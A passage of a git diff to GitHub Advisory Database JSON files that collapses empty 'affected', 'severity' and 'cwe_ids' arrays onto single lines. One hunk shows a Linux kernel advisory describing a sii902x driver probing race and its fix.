+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-g2f8-pfg4-3w3q/GHSA-g2f8-pfg4-3w3q.json b/advisories/unreviewed/2024/01/GHSA-g2f8-pfg4-3w3q/GHSA-g2f8-pfg4-3w3q.json
index 32ad8e2e1b0..e118297d3ec 100644
--- a/advisories/unreviewed/2024/01/GHSA-g2f8-pfg4-3w3q/GHSA-g2f8-pfg4-3w3q.json
+++ b/advisories/unreviewed/2024/01/GHSA-g2f8-pfg4-3w3q/GHSA-g2f8-pfg4-3w3q.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-h3vc-4gq7-6h97/GHSA-h3vc-4gq7-6h97.json b/advisories/unreviewed/2024/01/GHSA-h3vc-4gq7-6h97/GHSA-h3vc-4gq7-6h97.json
index 46cea6ad48a..8ddf8532d43 100644
--- a/advisories/unreviewed/2024/01/GHSA-h3vc-4gq7-6h97/GHSA-h3vc-4gq7-6h97.json
+++ b/advisories/unreviewed/2024/01/GHSA-h3vc-4gq7-6h97/GHSA-h3vc-4gq7-6h97.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-jggv-jphq-xvw7/GHSA-jggv-jphq-xvw7.json b/advisories/unreviewed/2024/01/GHSA-jggv-jphq-xvw7/GHSA-jggv-jphq-xvw7.json
index b791748e7ed..dd4211702d7 100644
--- a/advisories/unreviewed/2024/01/GHSA-jggv-jphq-xvw7/GHSA-jggv-jphq-xvw7.json
+++ b/advisories/unreviewed/2024/01/GHSA-jggv-jphq-xvw7/GHSA-jggv-jphq-xvw7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-jm98-mxmf-qcjw/GHSA-jm98-mxmf-qcjw.json b/advisories/unreviewed/2024/01/GHSA-jm98-mxmf-qcjw/GHSA-jm98-mxmf-qcjw.json
index 5abeb59efd8..59fab26f24a 100644
--- a/advisories/unreviewed/2024/01/GHSA-jm98-mxmf-qcjw/GHSA-jm98-mxmf-qcjw.json
+++ b/advisories/unreviewed/2024/01/GHSA-jm98-mxmf-qcjw/GHSA-jm98-mxmf-qcjw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-m525-p4rf-7h93/GHSA-m525-p4rf-7h93.json b/advisories/unreviewed/2024/01/GHSA-m525-p4rf-7h93/GHSA-m525-p4rf-7h93.json
index 104b2231b5e..0a8e0cd897d 100644
--- a/advisories/unreviewed/2024/01/GHSA-m525-p4rf-7h93/GHSA-m525-p4rf-7h93.json
+++ b/advisories/unreviewed/2024/01/GHSA-m525-p4rf-7h93/GHSA-m525-p4rf-7h93.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-pcgj-qq2c-qx79/GHSA-pcgj-qq2c-qx79.json b/advisories/unreviewed/2024/01/GHSA-pcgj-qq2c-qx79/GHSA-pcgj-qq2c-qx79.json
index d23a9727395..6d4c7ea06e6 100644
--- a/advisories/unreviewed/2024/01/GHSA-pcgj-qq2c-qx79/GHSA-pcgj-qq2c-qx79.json
+++ b/advisories/unreviewed/2024/01/GHSA-pcgj-qq2c-qx79/GHSA-pcgj-qq2c-qx79.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-pvw6-vc2c-x7v5/GHSA-pvw6-vc2c-x7v5.json b/advisories/unreviewed/2024/01/GHSA-pvw6-vc2c-x7v5/GHSA-pvw6-vc2c-x7v5.json
index 441e0790e2b..5d8b3dd879a 100644
--- a/advisories/unreviewed/2024/01/GHSA-pvw6-vc2c-x7v5/GHSA-pvw6-vc2c-x7v5.json
+++ b/advisories/unreviewed/2024/01/GHSA-pvw6-vc2c-x7v5/GHSA-pvw6-vc2c-x7v5.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/01/GHSA-q6j4-xjv3-96rj/GHSA-q6j4-xjv3-96rj.json b/advisories/unreviewed/2024/01/GHSA-q6j4-xjv3-96rj/GHSA-q6j4-xjv3-96rj.json
index 28387a92fc3..ce4f704ce3c 100644
--- a/advisories/unreviewed/2024/01/GHSA-q6j4-xjv3-96rj/GHSA-q6j4-xjv3-96rj.json
+++ b/advisories/unreviewed/2024/01/GHSA-q6j4-xjv3-96rj/GHSA-q6j4-xjv3-96rj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-rpp9-fjv3-6cxw/GHSA-rpp9-fjv3-6cxw.json b/advisories/unreviewed/2024/01/GHSA-rpp9-fjv3-6cxw/GHSA-rpp9-fjv3-6cxw.json
index 9af91f70e6a..a925dc4c43e 100644
--- a/advisories/unreviewed/2024/01/GHSA-rpp9-fjv3-6cxw/GHSA-rpp9-fjv3-6cxw.json
+++ b/advisories/unreviewed/2024/01/GHSA-rpp9-fjv3-6cxw/GHSA-rpp9-fjv3-6cxw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-vqmp-r4j7-xh29/GHSA-vqmp-r4j7-xh29.json b/advisories/unreviewed/2024/01/GHSA-vqmp-r4j7-xh29/GHSA-vqmp-r4j7-xh29.json
index 565f28c32e9..c678ecf4d3b 100644
--- a/advisories/unreviewed/2024/01/GHSA-vqmp-r4j7-xh29/GHSA-vqmp-r4j7-xh29.json
+++ b/advisories/unreviewed/2024/01/GHSA-vqmp-r4j7-xh29/GHSA-vqmp-r4j7-xh29.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-w32c-gg4j-5fxv/GHSA-w32c-gg4j-5fxv.json b/advisories/unreviewed/2024/01/GHSA-w32c-gg4j-5fxv/GHSA-w32c-gg4j-5fxv.json
index 9d7e24c8ed9..21f6ed86e75 100644
--- a/advisories/unreviewed/2024/01/GHSA-w32c-gg4j-5fxv/GHSA-w32c-gg4j-5fxv.json
+++ b/advisories/unreviewed/2024/01/GHSA-w32c-gg4j-5fxv/GHSA-w32c-gg4j-5fxv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/01/GHSA-w45w-99c9-fqr4/GHSA-w45w-99c9-fqr4.json b/advisories/unreviewed/2024/01/GHSA-w45w-99c9-fqr4/GHSA-w45w-99c9-fqr4.json
index 924aa1596dc..b139417ab47 100644
--- a/advisories/unreviewed/2024/01/GHSA-w45w-99c9-fqr4/GHSA-w45w-99c9-fqr4.json
+++ b/advisories/unreviewed/2024/01/GHSA-w45w-99c9-fqr4/GHSA-w45w-99c9-fqr4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/01/GHSA-w5f8-jmcg-4qrj/GHSA-w5f8-jmcg-4qrj.json b/advisories/unreviewed/2024/01/GHSA-w5f8-jmcg-4qrj/GHSA-w5f8-jmcg-4qrj.json
index f0bc1c1fc47..15ee09926b8 100644
--- a/advisories/unreviewed/2024/01/GHSA-w5f8-jmcg-4qrj/GHSA-w5f8-jmcg-4qrj.json
+++ b/advisories/unreviewed/2024/01/GHSA-w5f8-jmcg-4qrj/GHSA-w5f8-jmcg-4qrj.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/01/GHSA-xvjx-j3q9-j35p/GHSA-xvjx-j3q9-j35p.json b/advisories/unreviewed/2024/01/GHSA-xvjx-j3q9-j35p/GHSA-xvjx-j3q9-j35p.json
index 1cb5fa4920e..760eaf7f444 100644
--- a/advisories/unreviewed/2024/01/GHSA-xvjx-j3q9-j35p/GHSA-xvjx-j3q9-j35p.json
+++ b/advisories/unreviewed/2024/01/GHSA-xvjx-j3q9-j35p/GHSA-xvjx-j3q9-j35p.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -31,9 +29,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": "MODERATE",
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-23h8-ggh4-vmhv/GHSA-23h8-ggh4-vmhv.json b/advisories/unreviewed/2024/02/GHSA-23h8-ggh4-vmhv/GHSA-23h8-ggh4-vmhv.json
index 7d854d81498..2fa9a4848d1 100644
--- a/advisories/unreviewed/2024/02/GHSA-23h8-ggh4-vmhv/GHSA-23h8-ggh4-vmhv.json
+++ b/advisories/unreviewed/2024/02/GHSA-23h8-ggh4-vmhv/GHSA-23h8-ggh4-vmhv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-2c82-fg6w-rjhp/GHSA-2c82-fg6w-rjhp.json b/advisories/unreviewed/2024/02/GHSA-2c82-fg6w-rjhp/GHSA-2c82-fg6w-rjhp.json
index a0cb2dd7072..4ba43cb8820 100644
--- a/advisories/unreviewed/2024/02/GHSA-2c82-fg6w-rjhp/GHSA-2c82-fg6w-rjhp.json
+++ b/advisories/unreviewed/2024/02/GHSA-2c82-fg6w-rjhp/GHSA-2c82-fg6w-rjhp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-2c83-rhjj-cjg4/GHSA-2c83-rhjj-cjg4.json b/advisories/unreviewed/2024/02/GHSA-2c83-rhjj-cjg4/GHSA-2c83-rhjj-cjg4.json
index 00b25163bf2..e89827339d4 100644
--- a/advisories/unreviewed/2024/02/GHSA-2c83-rhjj-cjg4/GHSA-2c83-rhjj-cjg4.json
+++ b/advisories/unreviewed/2024/02/GHSA-2c83-rhjj-cjg4/GHSA-2c83-rhjj-cjg4.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-2j57-prq3-h7v2/GHSA-2j57-prq3-h7v2.json b/advisories/unreviewed/2024/02/GHSA-2j57-prq3-h7v2/GHSA-2j57-prq3-h7v2.json
index c63b90136d0..f8fd061344a 100644
--- a/advisories/unreviewed/2024/02/GHSA-2j57-prq3-h7v2/GHSA-2j57-prq3-h7v2.json
+++ b/advisories/unreviewed/2024/02/GHSA-2j57-prq3-h7v2/GHSA-2j57-prq3-h7v2.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-2mvj-q2q3-wxjv/GHSA-2mvj-q2q3-wxjv.json b/advisories/unreviewed/2024/02/GHSA-2mvj-q2q3-wxjv/GHSA-2mvj-q2q3-wxjv.json
index c1778511cbb..fcfd5d1b396 100644
--- a/advisories/unreviewed/2024/02/GHSA-2mvj-q2q3-wxjv/GHSA-2mvj-q2q3-wxjv.json
+++ b/advisories/unreviewed/2024/02/GHSA-2mvj-q2q3-wxjv/GHSA-2mvj-q2q3-wxjv.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-2q4f-xv44-vmqf/GHSA-2q4f-xv44-vmqf.json b/advisories/unreviewed/2024/02/GHSA-2q4f-xv44-vmqf/GHSA-2q4f-xv44-vmqf.json
index 819e1096654..148e68b808f 100644
--- a/advisories/unreviewed/2024/02/GHSA-2q4f-xv44-vmqf/GHSA-2q4f-xv44-vmqf.json
+++ b/advisories/unreviewed/2024/02/GHSA-2q4f-xv44-vmqf/GHSA-2q4f-xv44-vmqf.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-2w64-q994-w6rw/GHSA-2w64-q994-w6rw.json b/advisories/unreviewed/2024/02/GHSA-2w64-q994-w6rw/GHSA-2w64-q994-w6rw.json
index 48d6de6d94b..dba3fe376c7 100644
--- a/advisories/unreviewed/2024/02/GHSA-2w64-q994-w6rw/GHSA-2w64-q994-w6rw.json
+++ b/advisories/unreviewed/2024/02/GHSA-2w64-q994-w6rw/GHSA-2w64-q994-w6rw.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-338x-q4qx-prw7/GHSA-338x-q4qx-prw7.json b/advisories/unreviewed/2024/02/GHSA-338x-q4qx-prw7/GHSA-338x-q4qx-prw7.json
index 53daba06ded..73452a168e7 100644
--- a/advisories/unreviewed/2024/02/GHSA-338x-q4qx-prw7/GHSA-338x-q4qx-prw7.json
+++ b/advisories/unreviewed/2024/02/GHSA-338x-q4qx-prw7/GHSA-338x-q4qx-prw7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-3659-jjmv-v338/GHSA-3659-jjmv-v338.json b/advisories/unreviewed/2024/02/GHSA-3659-jjmv-v338/GHSA-3659-jjmv-v338.json
index 213626d957b..35eb2b1d4c3 100644
--- a/advisories/unreviewed/2024/02/GHSA-3659-jjmv-v338/GHSA-3659-jjmv-v338.json
+++ b/advisories/unreviewed/2024/02/GHSA-3659-jjmv-v338/GHSA-3659-jjmv-v338.json
@@ -7,12 +7,8 @@
"CVE-2024-26607"
],
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/bridge: sii902x: Fix probing race issue\n\nA null pointer dereference crash has been observed rarely on TI\nplatforms using sii9022 bridge:\n\n[ 53.271356] sii902x_get_edid+0x34/0x70 [sii902x]\n[ 53.276066] sii902x_bridge_get_edid+0x14/0x20 [sii902x]\n[ 53.281381] drm_bridge_get_edid+0x20/0x34 [drm]\n[ 53.286305] drm_bridge_connector_get_modes+0x8c/0xcc [drm_kms_helper]\n[ 53.292955] drm_helper_probe_single_connector_modes+0x190/0x538 [drm_kms_helper]\n[ 53.300510] drm_client_modeset_probe+0x1f0/0xbd4 [drm]\n[ 53.305958] __drm_fb_helper_initial_config_and_unlock+0x50/0x510 [drm_kms_helper]\n[ 53.313611] drm_fb_helper_initial_config+0x48/0x58 [drm_kms_helper]\n[ 53.320039] drm_fbdev_dma_client_hotplug+0x84/0xd4 [drm_dma_helper]\n[ 53.326401] drm_client_register+0x5c/0xa0 [drm]\n[ 53.331216] drm_fbdev_dma_setup+0xc8/0x13c [drm_dma_helper]\n[ 53.336881] tidss_probe+0x128/0x264 [tidss]\n[ 53.341174] platform_probe+0x68/0xc4\n[ 53.344841] really_probe+0x188/0x3c4\n[ 53.348501] __driver_probe_device+0x7c/0x16c\n[ 53.352854] driver_probe_device+0x3c/0x10c\n[ 53.357033] __device_attach_driver+0xbc/0x158\n[ 53.361472] bus_for_each_drv+0x88/0xe8\n[ 53.365303] __device_attach+0xa0/0x1b4\n[ 53.369135] device_initial_probe+0x14/0x20\n[ 53.373314] bus_probe_device+0xb0/0xb4\n[ 53.377145] deferred_probe_work_func+0xcc/0x124\n[ 53.381757] process_one_work+0x1f0/0x518\n[ 53.385770] worker_thread+0x1e8/0x3dc\n[ 53.389519] kthread+0x11c/0x120\n[ 53.392750] ret_from_fork+0x10/0x20\n\nThe issue here is as follows:\n\n- tidss probes, but is deferred as sii902x is still missing.\n- sii902x starts probing and enters sii902x_init().\n- sii902x calls drm_bridge_add(). Now the sii902x bridge is ready from\n DRM's perspective.\n- sii902x calls sii902x_audio_codec_init() and\n platform_device_register_data()\n- The registration of the audio platform device causes probing of the\n deferred devices.\n- tidss probes, which eventually causes sii902x_bridge_get_edid() to be\n called.\n- sii902x_bridge_get_edid() tries to use the i2c to read the edid.\n However, the sii902x driver has not set up the i2c part yet, leading\n to the crash.\n\nFix this by moving the drm_bridge_add() to the end of the\nsii902x_init(), which is also at the very end of sii902x_probe().",
- "severity": [
-
- ],
- "affected": [
-
- ],
+ "severity": [],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
@@ -36,9 +32,7 @@
}
],
"database_specific": {
- "cwe_ids": [
-
- ],
+ "cwe_ids": [],
"severity": null,
"github_reviewed": false,
"github_reviewed_at": null,
diff --git a/advisories/unreviewed/2024/02/GHSA-39f6-9c52-27p8/GHSA-39f6-9c52-27p8.json b/advisories/unreviewed/2024/02/GHSA-39f6-9c52-27p8/GHSA-39f6-9c52-27p8.json
index 74d6c6c55e8..32685791df4 100644
--- a/advisories/unreviewed/2024/02/GHSA-39f6-9c52-27p8/GHSA-39f6-9c52-27p8.json
+++ b/advisories/unreviewed/2024/02/GHSA-39f6-9c52-27p8/GHSA-39f6-9c52-27p8.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-3c3r-6mf2-xcmp/GHSA-3c3r-6mf2-xcmp.json b/advisories/unreviewed/2024/02/GHSA-3c3r-6mf2-xcmp/GHSA-3c3r-6mf2-xcmp.json
index cddf0ab7f2a..891f39b4164 100644
--- a/advisories/unreviewed/2024/02/GHSA-3c3r-6mf2-xcmp/GHSA-3c3r-6mf2-xcmp.json
+++ b/advisories/unreviewed/2024/02/GHSA-3c3r-6mf2-xcmp/GHSA-3c3r-6mf2-xcmp.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-3crg-pxfc-qcxm/GHSA-3crg-pxfc-qcxm.json b/advisories/unreviewed/2024/02/GHSA-3crg-pxfc-qcxm/GHSA-3crg-pxfc-qcxm.json
index 6adabd52501..ba47d274812 100644
--- a/advisories/unreviewed/2024/02/GHSA-3crg-pxfc-qcxm/GHSA-3crg-pxfc-qcxm.json
+++ b/advisories/unreviewed/2024/02/GHSA-3crg-pxfc-qcxm/GHSA-3crg-pxfc-qcxm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-3hwp-p2jw-j4xh/GHSA-3hwp-p2jw-j4xh.json b/advisories/unreviewed/2024/02/GHSA-3hwp-p2jw-j4xh/GHSA-3hwp-p2jw-j4xh.json
index 1b950f8e3bd..6560821364b 100644
--- a/advisories/unreviewed/2024/02/GHSA-3hwp-p2jw-j4xh/GHSA-3hwp-p2jw-j4xh.json
+++ b/advisories/unreviewed/2024/02/GHSA-3hwp-p2jw-j4xh/GHSA-3hwp-p2jw-j4xh.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-3mgm-628r-4cx7/GHSA-3mgm-628r-4cx7.json b/advisories/unreviewed/2024/02/GHSA-3mgm-628r-4cx7/GHSA-3mgm-628r-4cx7.json
index b96293a9418..f3488df53c4 100644
--- a/advisories/unreviewed/2024/02/GHSA-3mgm-628r-4cx7/GHSA-3mgm-628r-4cx7.json
+++ b/advisories/unreviewed/2024/02/GHSA-3mgm-628r-4cx7/GHSA-3mgm-628r-4cx7.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-3mrr-cw9q-727m/GHSA-3mrr-cw9q-727m.json b/advisories/unreviewed/2024/02/GHSA-3mrr-cw9q-727m/GHSA-3mrr-cw9q-727m.json
index 80cc3bc775c..0d92b0e160a 100644
--- a/advisories/unreviewed/2024/02/GHSA-3mrr-cw9q-727m/GHSA-3mrr-cw9q-727m.json
+++ b/advisories/unreviewed/2024/02/GHSA-3mrr-cw9q-727m/GHSA-3mrr-cw9q-727m.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-3qq5-wcrx-4h8r/GHSA-3qq5-wcrx-4h8r.json b/advisories/unreviewed/2024/02/GHSA-3qq5-wcrx-4h8r/GHSA-3qq5-wcrx-4h8r.json
index 421c6004797..3d898ee30d1 100644
--- a/advisories/unreviewed/2024/02/GHSA-3qq5-wcrx-4h8r/GHSA-3qq5-wcrx-4h8r.json
+++ b/advisories/unreviewed/2024/02/GHSA-3qq5-wcrx-4h8r/GHSA-3qq5-wcrx-4h8r.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-3x87-pjpc-6c9c/GHSA-3x87-pjpc-6c9c.json b/advisories/unreviewed/2024/02/GHSA-3x87-pjpc-6c9c/GHSA-3x87-pjpc-6c9c.json
index b3c5906f3b0..30275c5864c 100644
--- a/advisories/unreviewed/2024/02/GHSA-3x87-pjpc-6c9c/GHSA-3x87-pjpc-6c9c.json
+++ b/advisories/unreviewed/2024/02/GHSA-3x87-pjpc-6c9c/GHSA-3x87-pjpc-6c9c.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:N/I:N/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-43h9-p3j4-39hm/GHSA-43h9-p3j4-39hm.json b/advisories/unreviewed/2024/02/GHSA-43h9-p3j4-39hm/GHSA-43h9-p3j4-39hm.json
index 27c627d0b51..bd8fb40a296 100644
--- a/advisories/unreviewed/2024/02/GHSA-43h9-p3j4-39hm/GHSA-43h9-p3j4-39hm.json
+++ b/advisories/unreviewed/2024/02/GHSA-43h9-p3j4-39hm/GHSA-43h9-p3j4-39hm.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-43mr-mm46-m2qq/GHSA-43mr-mm46-m2qq.json b/advisories/unreviewed/2024/02/GHSA-43mr-mm46-m2qq/GHSA-43mr-mm46-m2qq.json
index 57e3a175dde..d7d6bf36ff4 100644
--- a/advisories/unreviewed/2024/02/GHSA-43mr-mm46-m2qq/GHSA-43mr-mm46-m2qq.json
+++ b/advisories/unreviewed/2024/02/GHSA-43mr-mm46-m2qq/GHSA-43mr-mm46-m2qq.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-4585-28v2-8h46/GHSA-4585-28v2-8h46.json b/advisories/unreviewed/2024/02/GHSA-4585-28v2-8h46/GHSA-4585-28v2-8h46.json
index 1a30fe9a7c4..120e1580d19 100644
--- a/advisories/unreviewed/2024/02/GHSA-4585-28v2-8h46/GHSA-4585-28v2-8h46.json
+++ b/advisories/unreviewed/2024/02/GHSA-4585-28v2-8h46/GHSA-4585-28v2-8h46.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-46w7-w3p6-27qr/GHSA-46w7-w3p6-27qr.json b/advisories/unreviewed/2024/02/GHSA-46w7-w3p6-27qr/GHSA-46w7-w3p6-27qr.json
index a5482d7af5b..d7712fd7bad 100644
--- a/advisories/unreviewed/2024/02/GHSA-46w7-w3p6-27qr/GHSA-46w7-w3p6-27qr.json
+++ b/advisories/unreviewed/2024/02/GHSA-46w7-w3p6-27qr/GHSA-46w7-w3p6-27qr.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-47rf-cwjx-w5r6/GHSA-47rf-cwjx-w5r6.json b/advisories/unreviewed/2024/02/GHSA-47rf-cwjx-w5r6/GHSA-47rf-cwjx-w5r6.json
index 38a45c86cc9..a4e94feb305 100644
--- a/advisories/unreviewed/2024/02/GHSA-47rf-cwjx-w5r6/GHSA-47rf-cwjx-w5r6.json
+++ b/advisories/unreviewed/2024/02/GHSA-47rf-cwjx-w5r6/GHSA-47rf-cwjx-w5r6.json
@@ -13,9 +13,7 @@
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L"
}
],
- "affected": [
-
- ],
+ "affected": [],
"references": [
{
"type": "ADVISORY",
diff --git a/advisories/unreviewed/2024/02/GHSA-4926-px5g-wrp7/GHSA-4926-px5g-wrp7.json b/advisories/unreviewed/2024/02/GHSA-4926-px5g-wrp7/GHSA-4926-px5g-wrp7.json
